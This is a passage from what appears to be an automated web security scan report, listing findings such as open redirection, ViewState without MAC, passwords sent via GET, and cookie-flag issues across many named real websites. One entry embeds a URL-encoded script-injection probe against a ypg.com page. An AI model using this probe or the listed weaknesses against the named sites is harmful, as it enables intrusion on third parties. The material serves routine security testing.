13.2. http://l.sharethis.com/pview

13.3. http://www.evri.com/

13.4. http://www.evri.com/accounts/sign_in

13.5. http://www.evri.com/accounts/sign_up

13.6. http://www.evri.com/technology/web

13.7. https://www.evri.com/accounts/sign_in

13.8. https://www.evri.com/accounts/sign_up

13.9. http://www.facebook.com/extern/login_status.php

13.10. http://www.google.com/realtimejs

13.11. http://www.invisor.net/

13.12. http://www.invisor.net/management-consultant/

13.13. http://www.mypowerblock.com/

13.14. http://www.mypowerblock.com/events

13.15. http://www.mypowerblock.com/group/classiccarrestorations

13.16. http://www.mypowerblock.com/groups

13.17. http://www.mypowerblock.com/groups/group/listForContributor

13.18. http://www.mypowerblock.com/main/authorization/signIn

13.19. http://www.mypowerblock.com/main/authorization/signUp

13.20. http://www.mypowerblock.com/page/powerblock-makeover

13.21. http://www.mypowerblock.com/profile/randcali

13.22. http://www.mypowerblock.com/profiles/members/

13.23. http://www.mypowerblock.com/video

13.24. http://www.mypowerblock.com/video/2170052:Video:1098573

13.25. http://www.websearchdesign.com/

13.26. http://www.youtube.com/user/vascodatasecurity10

13.27. http://www.ypg.com/en/

13.28. http://www.ypg.com/en/contact-us

13.29. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

13.30. http://www.ypg.com/en/images/loading.gif

14. Password field submitted using GET method

14.1. http://digg.com/submit

14.2. https://www.rockyou.com/login/

14.3. https://www.rockyou.com/login/index.php

15. ASP.NET ViewState without MAC enabled

15.1. http://www.cov.com/

15.2. http://www.cov.com/favicon.ico

16. Open redirection

16.1. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [host parameter]

16.2. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [host parameter]

16.3. http://sundiogroup.com/ [name of an arbitrarily supplied request parameter]

17. Cookie scoped to parent domain

17.1. http://api.twitter.com/1/statuses/user_timeline.json

17.2. http://mypowerblock.ning.com/crossdomain.xml

17.3. http://mypowerblock.ning.com/main/badge/showPlayerConfig

17.4. http://store.nike.com/us/en_us/

17.5. http://www.mypowerblock.com/

17.6. http://www.mypowerblock.com/crossdomain.xml

17.7. http://www.mypowerblock.com/events

17.8. http://www.mypowerblock.com/favicon.ico

17.9. http://www.mypowerblock.com/group/classiccarrestorations

17.10. http://www.mypowerblock.com/groups

17.11. http://www.mypowerblock.com/groups/group/listForContributor

17.12. http://www.mypowerblock.com/main/authorization/signIn

17.13. http://www.mypowerblock.com/main/authorization/signUp

17.14. http://www.mypowerblock.com/main/badge/showPlayerConfig

17.15. http://www.mypowerblock.com/page/powerblock-makeover

17.16. http://www.mypowerblock.com/profile/randcali

17.17. http://www.mypowerblock.com/profiles/members/

17.18. http://www.mypowerblock.com/video

17.19. http://www.mypowerblock.com/video/2170052:Video:1098573

17.20. http://www.mypowerblock.com/video/video/incrementCount

17.21. http://www.mypowerblock.com/video/video/showPlayerConfig

17.22. http://www.mypowerblock.com/video/video/videoData

17.23. http://www.mypowerblock.com/xn/loader

17.24. http://www.nike.com/

17.25. http://www.nike.com/nikegolf/global/utils/proxy.jsp

17.26. http://ad.afy11.net/ad

17.27. http://ad.amgdgt.com/ads/

17.28. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU72oBrc.k9cRrqkOYV3Hiw46DqOlnZW8sdXNhLHQsMTMwMzA4ODYwMTY0MCxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9IQo-/clkurl=

17.29. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUQdQNLiVpA659RXdxKFmnF_R8SXRnZW8sdXNhLHQsMTMwMzA4ODY5OTk4NixjLDMyMTYxMSxwYyw3NjI5MCxhYywxNTEzNTYsbyxOMC1TMCxsLDUzOTkwLHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9V3hyZmxTdHg3MFMyTXhQLXduWEhuejFiQmNnaHJhS1BGZUdkTDVjYUFNd1pJR2FFakZDRGZLaEVXc09lcWtQeHN1dXhubk93cEViZUtpZFVnQTVBSVpLTjBsTUkxbXd3a3dWZDUxZDlhSTA9IQo-/clkurl=

17.30. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Leaderboard_RON

17.31. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON

17.32. http://adclick.g.doubleclick.net/aclk

17.33. http://ads.adxpose.com/ads/ads.js

17.34. http://ads.revsci.net/adserver/ako

17.35. http://ak1.abmr.net/is/www.nike.com

17.36. http://akamai.mathtag.com/sync/img

17.37. http://altfarm.mediaplex.com/ad/js/16228-124632-26209-0

17.38. http://altfarm.mediaplex.com/ad/js/16228-124632-26209-1

17.39. http://b.scorecardresearch.com/b

17.40. http://b.scorecardresearch.com/p

17.41. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.42. http://cspix.media6degrees.com/orbserv/hbpix

17.43. http://del.icio.us/post

17.44. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

17.45. http://id.google.com/verify/EAAAACWQHvFsCkXnG6IFmaDE7pU.gif

17.46. http://id.google.com/verify/EAAAAH9IMQM3viFLAEbGIFaMGfE.gif

17.47. http://id.google.com/verify/EAAAAHe5vAhUAllxQrtVzUsjxGY.gif

17.48. http://id.google.com/verify/EAAAAKel5Pdy3U6ieT7gd1OFqOM.gif

17.49. http://id.google.com/verify/EAAAAMPdxS6blRGoofmYQ0x9F7g.gif

17.50. http://id.google.com/verify/EAAAAMhwZhsTAGP4iQnFoqwM7X4.gif

17.51. http://id.google.com/verify/EAAAANiP5ycXI0sghSk0SQsFuRY.gif

17.52. http://id.google.com/verify/EAAAANnh-YD1bm5JZp6eOKbsFzQ.gif

17.53. http://l.sharethis.com/pview

17.54. http://map.yahooapis.jp/MapsService/embedmap/V2/

17.55. http://maps.google.com/maps

17.56. http://mp.apmebf.com/ad/js/16228-124632-26209-0

17.57. http://mp.apmebf.com/ad/js/16228-124632-26209-1

17.58. http://pix04.revsci.net/K08784/b3/0/3/1003161/136493630.js

17.59. http://pix04.revsci.net/K08784/b3/0/3/1003161/136493630.js

17.60. http://pix04.revsci.net/K08784/b3/0/3/1003161/20400553.js

17.61. http://pix04.revsci.net/K08784/b3/0/3/1003161/20400553.js

17.62. http://pix04.revsci.net/K08784/b3/0/3/1003161/20400553.js

17.63. http://pix04.revsci.net/K08784/b3/0/3/1003161/20400553.js

17.64. http://pix04.revsci.net/K08784/b3/0/3/1003161/276548485.js

17.65. http://pix04.revsci.net/K08784/b3/0/3/1003161/285006021.js

17.66. http://pix04.revsci.net/K08784/b3/0/3/1003161/285006021.js

17.67. http://pix04.revsci.net/K08784/b3/0/3/1003161/306449953.js

17.68. http://pix04.revsci.net/K08784/b3/0/3/1003161/306449953.js

17.69. http://pix04.revsci.net/K08784/b3/0/3/1003161/306449953.js

17.70. http://pix04.revsci.net/K08784/b3/0/3/1003161/306449953.js

17.71. http://pix04.revsci.net/K08784/b3/0/3/1003161/350201110.js

17.72. http://pix04.revsci.net/K08784/b3/0/3/1003161/35982285.js

17.73. http://pix04.revsci.net/K08784/b3/0/3/1003161/468038686.js

17.74. http://pix04.revsci.net/K08784/b3/0/3/1003161/468038686.js

17.75. http://pix04.revsci.net/K08784/b3/0/3/1003161/468038686.js

17.76. http://pix04.revsci.net/K08784/b3/0/3/1003161/468038686.js

17.77. http://pix04.revsci.net/K08784/b3/0/3/1003161/486158063.js

17.78. http://pix04.revsci.net/K08784/b3/0/3/1003161/486158063.js

17.79. http://pix04.revsci.net/K08784/b3/0/3/1003161/486158063.js

17.80. http://pix04.revsci.net/K08784/b3/0/3/1003161/486158063.js

17.81. http://pix04.revsci.net/K08784/b3/0/3/1003161/51376640.js

17.82. http://pix04.revsci.net/K08784/b3/0/3/1003161/51376640.js

17.83. http://pix04.revsci.net/K08784/b3/0/3/1003161/530844213.js

17.84. http://pix04.revsci.net/K08784/b3/0/3/1003161/8001629.js

17.85. http://pix04.revsci.net/K08784/b3/0/3/1003161/8001629.js

17.86. http://pix04.revsci.net/K08784/b3/0/3/1003161/810821406.js

17.87. http://pix04.revsci.net/K08784/b3/0/3/1003161/810821406.js

17.88. http://pix04.revsci.net/K08784/b3/0/3/1003161/96907754.js

17.89. http://pix04.revsci.net/K08784/b3/0/3/1003161/96907754.js

17.90. http://pixel.33across.com/ps/

17.91. http://pixel.quantserve.com/pixel

17.92. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services

17.93. http://receive.inplay.tubemogul.com/StreamReceiver/services

17.94. http://rover.ebay.com/roversync/

17.95. http://secure-us.imrworldwide.com/cgi-bin/m

17.96. http://t4.trackalyzer.com/trackalyze.asp

17.97. http://technet.microsoft.com/en-us/security/cc308589

17.98. http://www.humaniplex.com/

17.99. http://www.humaniplex.com/blogs/

17.100. http://www.humaniplex.com/classifieds/

17.101. http://www.humaniplex.com/clubs/list

17.102. http://www.humaniplex.com/flirts/

17.103. http://www.humaniplex.com/index.html

17.104. http://www.humaniplex.com/mingle/

17.105. http://www.humaniplex.com/profiles/

17.106. http://www.humaniplex.com/tos/site.html

17.107. http://www.humaniplex.com/user_tools/forgot_password/

17.108. http://www.humaniplex.com/user_tools/join/

17.109. http://www.linkedin.com/in/julieshumaker

17.110. http://www.linkedin.com/pub/greg-kearney/0/277/6b5

17.111. http://www.martindale.com/ContactUs.aspx

17.112. http://www.martindale.com/Results.aspx

17.113. http://www.martindale.com/all/c-england/all-lawyers-10.htm

17.114. http://www.martindale.com/all/c-england/all-lawyers-11.htm

17.115. http://www.martindale.com/all/c-england/all-lawyers-3.htm

17.116. http://www.martindale.com/all/c-england/all-lawyers-4.htm

17.117. http://www.martindale.com/all/c-england/all-lawyers-5.htm

17.118. http://www.martindale.com/all/c-england/all-lawyers-6.htm

17.119. http://www.martindale.com/all/c-england/all-lawyers-7.htm

17.120. http://www.martindale.com/all/c-england/all-lawyers-8.htm

17.121. http://www.martindale.com/all/c-england/all-lawyers-9.htm

17.122. http://www.martindale.com/all/c-england/all-lawyers.htm

17.123. http://www.nike.com/global-landing/content/sport-moment/nikecom_p1/CTA_en_US.jpg

17.124. http://www.nike.com/nsl/services/user/isloggedin

17.125. http://www.rockyou.com/ajaxticker.php

17.126. http://www.rockyou.com/ctimer/create.php

17.127. http://www.rockyou.com/fxtext/fxtext-create.php

17.128. http://www.rockyou.com/fxtext/hi5Help.php

17.129. http://www.rockyou.com/login.php

17.130. http://www.rockyou.com/show_my_gallery.php

17.131. http://www.rockyou.com/tos.php

17.132. https://www.rockyou.com/login/

17.133. https://www.rockyou.com/login/index.php

17.134. https://www.rockyou.com/resetpassword.php

17.135. http://www.viglink.com/

17.136. http://www.viglink.com/

17.137. http://www.youtube.com/user/vascodatasecurity10

17.138. http://xcdn.xgraph.net/15530/db/xg.gif

18. Cookie without HttpOnly flag set

18.1. http://3515178b5d.mypowerblock.ninggadgets.com/gadgets/ifr

18.2. http://3515178b5d.mypowerblock.ninggadgets.com/gadgets/makeRequest

18.3. http://3515178b5d.mypowerblock.ninggadgets.com/social/rpc

18.4. http://ads.adxpose.com/ads/ads.js

18.5. http://api.mypowerblock.ninggadgets.com/gadgets/js/rpc.js

18.6. http://community.martindale.com/groups/groupdirectory.aspx

18.7. http://counter.rewardsnetwork.com/eluminate

18.8. http://event.adxpose.com/event.flow

18.9. http://home.onlyinternet.net/

18.10. http://longislanderotic.com/

18.11. http://longislanderotic.com/

18.12. http://longislanderotic.com/

18.13. http://mail.yankeespirits.com/

18.14. http://mail.yankeespirits.com/

18.15. http://mypowerblock.ning.com/crossdomain.xml

18.16. http://mypowerblock.ning.com/main/badge/showPlayerConfig

18.17. http://newton.newtonsoftware.com/career/CareerHome.action

18.18. http://oibw.net/

18.19. https://secure.webwiz.co.uk/clientarea/

18.20. https://secure.webwiz.co.uk/includes/default_javascript.js

18.21. http://securityincidents.org/

18.22. http://t4.trackalyzer.com/trackalyze.asp

18.23. http://webmail.onlyinternet.net/webmail/

18.24. http://www.aplaw.jp/en/

18.25. http://www.arnoldporter.com/

18.26. http://www.arnoldporter.com/content/industries/industries_print.css

18.27. http://www.curtis.com/

18.28. http://www.curtis.com/emaildisclaimer.cfm

18.29. http://www.curtis.com/favicon.ico

18.30. http://www.curtis.com/scripts/carousel/getimages.cfm

18.31. http://www.curtis.com/sitecontent.cfm

18.32. http://www.evri.com/

18.33. https://www.evri.com/accounts/sign_in

18.34. https://www.evri.com/accounts/sign_up

18.35. http://www.faegre.co.uk/index.aspx

18.36. http://www.friedfrank.com/

18.37. http://www.friedfrank.com/index.cfm

18.38. http://www.gtlaw.com/

18.39. http://www.gtlaw.com/favicon.ico

18.40. http://www.idine.com/

18.41. http://www.idine.com/ajax-one-box.htm

18.42. http://www.idine.com/dwr/call/plaincall/AjaxSearchService.getNeighborhoodsForMetro.dwr

18.43. http://www.idine.com/dwr/call/plaincall/AjaxSearchService.refineCuisine.dwr

18.44. http://www.idine.com/dwr/call/plaincall/AjaxSearchService.refineEstablishmentType.dwr

18.45. http://www.idine.com/dwr/call/plaincall/AjaxSearchService.refineNeighborhood.dwr

18.46. http://www.idine.com/dwr/call/plaincall/AjaxSearchService.refineRestaurantType.dwr

18.47. http://www.idine.com/dwr/call/plaincall/AjaxSearchService.resetKeepRefine.dwr

18.48. http://www.idine.com/dwr/call/plaincall/UserService.getLoginToken.dwr

18.49. http://www.idine.com/dwr/engine.js

18.50. https://www.idine.com/join.htm

18.51. http://www.invisor.net/

18.52. http://www.kslaw.com/

18.53. http://www.linkedin.com/in/julieshumaker

18.54. http://www.linkedin.com/pub/greg-kearney/0/277/6b5

18.55. http://www.longislanderotic.com/

18.56. http://www.longislanderotic.com/

18.57. http://www.longislanderotic.com/longislanderotic/forum/

18.58. http://www.longislanderotic.com/longislanderotic/forum/

18.59. http://www.longislanderotic.com/longislanderotic/forum/

18.60. http://www.martindale.com/all/c-england/all-lawyers-7.htm

18.61. http://www.martindale.com/all/c-england/all-lawyers.htm

18.62. http://www.mayerbrown.com/careeropportunities/index.asp

18.63. http://www.mayerbrown.com/careers/index.asp

18.64. http://www.mayerbrown.com/careers/none

18.65. http://www.mayerbrown.com/emergingmarkets/

18.66. http://www.mayerbrown.com/emergingmarkets/none

18.67. http://www.mayerbrown.com/favicon.ico

18.68. http://www.mayerbrown.com/lawyers/none

18.69. http://www.mayerbrown.com/lawyers/none

18.70. http://www.mayerbrown.com/lawyers/profile.asp

18.71. http://www.mayerbrown.com/lawyers/profile.asp

18.72. http://www.mayerbrown.com/legalnotices/index.asp

18.73. http://www.mayerbrown.com/practice/none

18.74. http://www.mayerbrown.com/practice/none

18.75. http://www.mayerbrown.com/practice/practicegroups.asp

18.76. http://www.mypowerblock.com/

18.77. http://www.mypowerblock.com/crossdomain.xml

18.78. http://www.mypowerblock.com/events

18.79. http://www.mypowerblock.com/favicon.ico

18.80. http://www.mypowerblock.com/group/classiccarrestorations

18.81. http://www.mypowerblock.com/groups

18.82. http://www.mypowerblock.com/groups/group/listForContributor

18.83. http://www.mypowerblock.com/main/authorization/signIn

18.84. http://www.mypowerblock.com/main/authorization/signUp

18.85. http://www.mypowerblock.com/main/badge/showPlayerConfig

18.86. http://www.mypowerblock.com/page/powerblock-makeover

18.87. http://www.mypowerblock.com/profile/randcali

18.88. http://www.mypowerblock.com/profiles/members/

18.89. http://www.mypowerblock.com/video

18.90. http://www.mypowerblock.com/video/2170052:Video:1098573

18.91. http://www.mypowerblock.com/video/video/incrementCount

18.92. http://www.mypowerblock.com/video/video/showPlayerConfig

18.93. http://www.mypowerblock.com/video/video/videoData

18.94. http://www.mypowerblock.com/xn/loader

18.95. http://www.ngi.it/

18.96. http://www.ngi.it/

18.97. http://www.ngi.it/

18.98. http://www.ngi.it/F3/

18.99. http://www.ngi.it/F4/

18.100. http://www.ngi.it/F4/index.asp

18.101. http://www.ngi.it/F5/

18.102. http://www.ngi.it/F5/listino_F5_FlatTime.asp

18.103. http://www.ngi.it/F6/

18.104. http://www.ngi.it/corporate/

18.105. http://www.ngi.it/corporate/adv.asp

18.106. http://www.ngi.it/corporate/assettosocietario.asp

18.107. http://www.ngi.it/corporate/cartaservizi.asp

18.108. http://www.ngi.it/corporate/mission.asp

18.109. http://www.ngi.it/corporate/stampa.asp

18.110. http://www.ngi.it/eolo/eolo_voce.asp

18.111. http://www.ngi.it/f5/index.asp

18.112. http://www.ngi.it/f6/index.asp

18.113. http://www.ngi.it/ipass/

18.114. http://www.ngi.it/ipass/

18.115. http://www.ngi.it/ipass/chi.asp

18.116. http://www.ngi.it/ipass/come.asp

18.117. http://www.ngi.it/ipass/contatti.asp

18.118. http://www.ngi.it/ipass/guide/guide.asp

18.119. http://www.ngi.it/ipass/index.asp

18.120. http://www.ngi.it/ipass/licenza.asp

18.121. http://www.ngi.it/ipass/listino.asp

18.122. http://www.ngi.it/ipass/pagamento.asp

18.123. http://www.ngi.it/squillo/

18.124. http://www.ngi.it/squillo/index.asp

18.125. http://www.ngi.it/virtuo/virtuopro.asp

18.126. https://www.ngi.it/F3/

18.127. https://www.ngi.it/F4/

18.128. https://www.ngi.it/F5/

18.129. https://www.ngi.it/F6/

18.130. https://www.ngi.it/arAgenti/

18.131. https://www.ngi.it/arClienti/ngiLoginLost.asp

18.132. https://www.ngi.it/arDealer/

18.133. https://www.ngi.it/corporate/

18.134. https://www.ngi.it/corporate/adv.asp

18.135. https://www.ngi.it/corporate/assettosocietario.asp

18.136. https://www.ngi.it/corporate/cartaservizi.asp

18.137. https://www.ngi.it/corporate/mission.asp

18.138. https://www.ngi.it/corporate/stampa.asp

18.139. https://www.ngi.it/gwHW/accessoriadsl.asp

18.140. https://www.ngi.it/gwHW/adsl4mega.asp

18.141. https://www.ngi.it/gwHW/adsl_voip.asp

18.142. https://www.ngi.it/gwHW/anagrafica.asp

18.143. https://www.ngi.it/gwHW/anagrafica.asp

18.144. https://www.ngi.it/gwHW/condizioni.asp

18.145. https://www.ngi.it/gwHW/contatti.asp

18.146. https://www.ngi.it/gwHW/eolo.asp

18.147. https://www.ngi.it/gwHW/faq.asp

18.148. https://www.ngi.it/gwHW/garanzie.asp

18.149. https://www.ngi.it/gwHW/metodipagamento.asp

18.150. https://www.ngi.it/gwHW/portadaptervoip.asp

18.151. https://www.ngi.it/gwHW/resi.asp

18.152. https://www.ngi.it/gwHW/router_hdsl.asp

18.153. https://www.ngi.it/gwHW/router_s_hdsl.asp

18.154. https://www.ngi.it/gwHW/telefonivoip.asp

18.155. https://www.ngi.it/gwHW/wiredadsl.asp

18.156. https://www.ngi.it/gwHW/wirelessadsl.asp

18.157. https://www.ngi.it/gwHw/

18.158. https://www.ngi.it/gwHw/

18.159. https://www.ngi.it/gwHw/adsl.asp

18.160. https://www.ngi.it/gwHw/error.asp

18.161. https://www.ngi.it/gwHw/error.asp

18.162. https://www.ngi.it/gwHw/hdsl.asp

18.163. https://www.ngi.it/gwHw/isdn.asp

18.164. https://www.ngi.it/gwHw/voip.asp

18.165. https://www.ngi.it/squillo/

18.166. http://www.nike.com/

18.167. http://www.nike.com/nikegolf/global/utils/proxy.jsp

18.168. http://www.powerblockswag.com/

18.169. http://www.powerblockswag.com/

18.170. http://www.powerblockswag.com/PhotoDetails.asp

18.171. http://www.rewardsnetwork.com/

18.172. http://www.socialfollow.com/

18.173. http://www.socialfollow.com/captcha/securimage_show.php

18.174. http://www.viglink.com/

18.175. http://www.viglink.com/corp/merchants

18.176. http://www.viglink.com/users/login

18.177. http://www.websearchdesign.com/

18.178. http://www.webwiz.co.uk/

18.179. http://www.webwiz.co.uk/web-wiz-forums/

18.180. http://www.webwizforums.com/

18.181. http://www.ypg.com/en/

18.182. http://209.234.249.173/External/Application/Session/D3-90-3B-AA-80-CE-74-CA-DB-71-B3-A9-83-81-75-0B/

18.183. http://ad.afy11.net/ad

18.184. http://ad.amgdgt.com/ads/

18.185. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU72oBrc.k9cRrqkOYV3Hiw46DqOlnZW8sdXNhLHQsMTMwMzA4ODYwMTY0MCxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9IQo-/clkurl=

18.186. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUQdQNLiVpA659RXdxKFmnF_R8SXRnZW8sdXNhLHQsMTMwMzA4ODY5OTk4NixjLDMyMTYxMSxwYyw3NjI5MCxhYywxNTEzNTYsbyxOMC1TMCxsLDUzOTkwLHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9V3hyZmxTdHg3MFMyTXhQLXduWEhuejFiQmNnaHJhS1BGZUdkTDVjYUFNd1pJR2FFakZDRGZLaEVXc09lcWtQeHN1dXhubk93cEViZUtpZFVnQTVBSVpLTjBsTUkxbXd3a3dWZDUxZDlhSTA9IQo-/clkurl=

18.187. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Leaderboard_RON

18.188. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON

18.189. http://ad.yieldmanager.com/pixel

18.190. http://adclick.g.doubleclick.net/aclk

18.191. http://ads.revsci.net/adserver/ako

18.192. http://adserver.adtechus.com/adserv/3.0/5124/1651942/0/154/ADTECH

18.193. http://affiliates.copeac.com/rotator/16387/1026&js=1&r=696389048.2527069&keyword=

18.194. http://affiliates.copeac.com/rotator/16387/1026&js=1&r=758359031370.3962&keyword=

18.195. http://affiliates.copeac.com/rotator/16387/1026&js=1&r=919910303700.1989&keyword=

18.196. http://ak1.abmr.net/is/www.nike.com

18.197. http://akamai.mathtag.com/sync/img

18.198. http://altfarm.mediaplex.com/ad/js/16228-124632-26209-0

18.199. http://altfarm.mediaplex.com/ad/js/16228-124632-26209-1

18.200. http://api.twitter.com/1/statuses/user_timeline.json

18.201. http://b.scorecardresearch.com/b

18.202. http://b.scorecardresearch.com/p

18.203. http://bs.serving-sys.com/BurstingPipe/adServer.bs

18.204. http://community.martindale.com/upgrade-your-connected-account.aspx

18.205. http://counter.rewardsnetwork.com/cm

18.206. http://counter.rewardsnetwork.com/eluminate

18.207. http://cspix.media6degrees.com/orbserv/hbpix

18.208. http://d1.openx.org/ajs.php

18.209. http://d1.openx.org/lg.php

18.210. http://del.icio.us/post

18.211. http://digg.com/submit

18.212. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

18.213. http://l.betrad.com/ct/0_0_0_0_0_456/pixel.gif

18.214. http://l.betrad.com/ct/0_0_0_0_0_456/us/0/1/0/0/0/0/16/242/273/0/pixel.gif

18.215. http://l.sharethis.com/pview

18.216. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

18.217. http://map.yahooapis.jp/MapsService/embedmap/V2/

18.218. http://map.yahooapis.jp/OpenLocalPlatform/V1/layer

18.219. http://maps.google.com/maps

18.220. http://microsoftsto.112.2o7.net/b/ss/msstotn,msstotnonly,msstotnmktenus,msstotncentroll,msstoubtnsec,msstotnctsec/1/H.20.3/s09357394229155

18.221. http://mochibot.com/mochiSWF

18.222. http://mp.apmebf.com/ad/js/16228-124632-26209-0

18.223. http://mp.apmebf.com/ad/js/16228-124632-26209-1

18.224. http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359

18.225. http://pix04.revsci.net/K08784/b3/0/3/1003161/136493630.js

18.226. http://pix04.revsci.net/K08784/b3/0/3/1003161/136493630.js

18.227. http://pix04.revsci.net/K08784/b3/0/3/1003161/20400553.js

18.228. http://pix04.revsci.net/K08784/b3/0/3/1003161/20400553.js

18.229. http://pix04.revsci.net/K08784/b3/0/3/1003161/20400553.js

18.230. http://pix04.revsci.net/K08784/b3/0/3/1003161/20400553.js

18.231. http://pix04.revsci.net/K08784/b3/0/3/1003161/276548485.js

18.232. http://pix04.revsci.net/K08784/b3/0/3/1003161/285006021.js

18.233. http://pix04.revsci.net/K08784/b3/0/3/1003161/285006021.js

18.234. http://pix04.revsci.net/K08784/b3/0/3/1003161/306449953.js

18.235. http://pix04.revsci.net/K08784/b3/0/3/1003161/306449953.js

18.236. http://pix04.revsci.net/K08784/b3/0/3/1003161/306449953.js

18.237. http://pix04.revsci.net/K08784/b3/0/3/1003161/306449953.js

18.238. http://pix04.revsci.net/K08784/b3/0/3/1003161/350201110.js

18.239. http://pix04.revsci.net/K08784/b3/0/3/1003161/35982285.js

18.240. http://pix04.revsci.net/K08784/b3/0/3/1003161/468038686.js

18.241. http://pix04.revsci.net/K08784/b3/0/3/1003161/468038686.js

18.242. http://pix04.revsci.net/K08784/b3/0/3/1003161/468038686.js

18.243. http://pix04.revsci.net/K08784/b3/0/3/1003161/468038686.js

18.244. http://pix04.revsci.net/K08784/b3/0/3/1003161/486158063.js

18.245. http://pix04.revsci.net/K08784/b3/0/3/1003161/486158063.js

18.246. http://pix04.revsci.net/K08784/b3/0/3/1003161/486158063.js

18.247. http://pix04.revsci.net/K08784/b3/0/3/1003161/486158063.js

18.248. http://pix04.revsci.net/K08784/b3/0/3/1003161/51376640.js

18.249. http://pix04.revsci.net/K08784/b3/0/3/1003161/51376640.js

18.250. http://pix04.revsci.net/K08784/b3/0/3/1003161/530844213.js

18.251. http://pix04.revsci.net/K08784/b3/0/3/1003161/8001629.js

18.252. http://pix04.revsci.net/K08784/b3/0/3/1003161/8001629.js

18.253. http://pix04.revsci.net/K08784/b3/0/3/1003161/810821406.js

18.254. http://pix04.revsci.net/K08784/b3/0/3/1003161/810821406.js

18.255. http://pix04.revsci.net/K08784/b3/0/3/1003161/96907754.js

18.256. http://pix04.revsci.net/K08784/b3/0/3/1003161/96907754.js

18.257. http://pixel.33across.com/ps/

18.258. http://pixel.quantserve.com/pixel

18.259. http://portal.smartertools.com/ST.ashx

18.260. http://r.unicornmedia.com/embed/ceab2aae-8ac1-419b-9816-9acd7bc1b030

18.261. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services

18.262. http://receive.inplay.tubemogul.com/StreamReceiver/services

18.263. http://rover.ebay.com/roversync/

18.264. http://rtmproductions.122.2o7.net/b/ss/rtmtv-powerblocktv/1/H.22.1/s19152823039330

18.265. http://secure-us.imrworldwide.com/cgi-bin/m

18.266. http://ski.sunweb.co.uk/

18.267. http://statse.webtrendslive.com/dcsmflrdu00000o2m1qc52x7l_4q3e/dcs.gif

18.268. http://store.nike.com/us/en_us/

18.269. http://technet.microsoft.com/en-us/security/cc308589

18.270. http://twitter.com/share

18.271. http://www.amt-law.com/en/

18.272. http://www.aplaw.jp/

18.273. http://www.aplaw.jp/css/print.css

18.274. http://www.aplaw.jp/favicon.ico

18.275. http://www.barracudanetworks.com/

18.276. http://www.barracudanetworks.com/ns/

18.277. http://www.cov.com/

18.278. http://www.cov.com/favicon.ico

18.279. http://www.evri.com/entity-images/assets/adrian_gonzalez_Featured.JPG

18.280. http://www.evri.com/entity-images/assets/adrian_gonzalez_Preview.JPG

18.281. http://www.evri.com/entity-images/assets/burka_ban_backlash_Featured.JPG

18.282. http://www.evri.com/entity-images/assets/burka_ban_backlash_Preview.JPG

18.283. http://www.evri.com/entity-images/assets/italian_activist_Featured.JPG

18.284. http://www.evri.com/entity-images/assets/italian_activist_Preview.JPG

18.285. http://www.evri.com/entity-images/assets/libya_nato_Featured.JPG

18.286. http://www.evri.com/entity-images/assets/libya_nato_Preview.JPG

18.287. http://www.evri.com/entity-images/assets/soaps_cancelled_Featured.JPG

18.288. http://www.evri.com/entity-images/assets/soaps_cancelled_Preview.JPG

18.289. http://www.humaniplex.com/

18.290. http://www.humaniplex.com/blogs/

18.291. http://www.humaniplex.com/classifieds/

18.292. http://www.humaniplex.com/clubs/list

18.293. http://www.humaniplex.com/flirts/

18.294. http://www.humaniplex.com/index.html

18.295. http://www.humaniplex.com/mingle/

18.296. http://www.humaniplex.com/profiles/

18.297. http://www.humaniplex.com/tos/site.html

18.298. http://www.humaniplex.com/user_tools/forgot_password/

18.299. http://www.humaniplex.com/user_tools/join/

18.300. http://www.leaseweb.com/

18.301. http://www.leaseweb.com/nl/over-ons/klanten

18.302. http://www.martindale.com/ContactUs.aspx

18.303. http://www.martindale.com/Results.aspx

18.304. http://www.martindale.com/all/c-england/all-lawyers-10.htm

18.305. http://www.martindale.com/all/c-england/all-lawyers-11.htm

18.306. http://www.martindale.com/all/c-england/all-lawyers-3.htm

18.307. http://www.martindale.com/all/c-england/all-lawyers-4.htm

18.308. http://www.martindale.com/all/c-england/all-lawyers-5.htm

18.309. http://www.martindale.com/all/c-england/all-lawyers-6.htm

18.310. http://www.martindale.com/all/c-england/all-lawyers-8.htm

18.311. http://www.martindale.com/all/c-england/all-lawyers-9.htm

18.312. http://www.mayerbrown.com/Utilities/vCardGen.aspx

18.313. http://www.mayerbrown.com/london/index.asp

18.314. http://www.mayerbrown.com/mayerbrownjsm/index.asp

18.315. http://www.millerwelds.com/financing/minisite.css

18.316. http://www.millerwelds.com/includes/master.css

18.317. http://www.millerwelds.com/includes/master.js

18.318. http://www.millerwelds.com/includes/menu.js

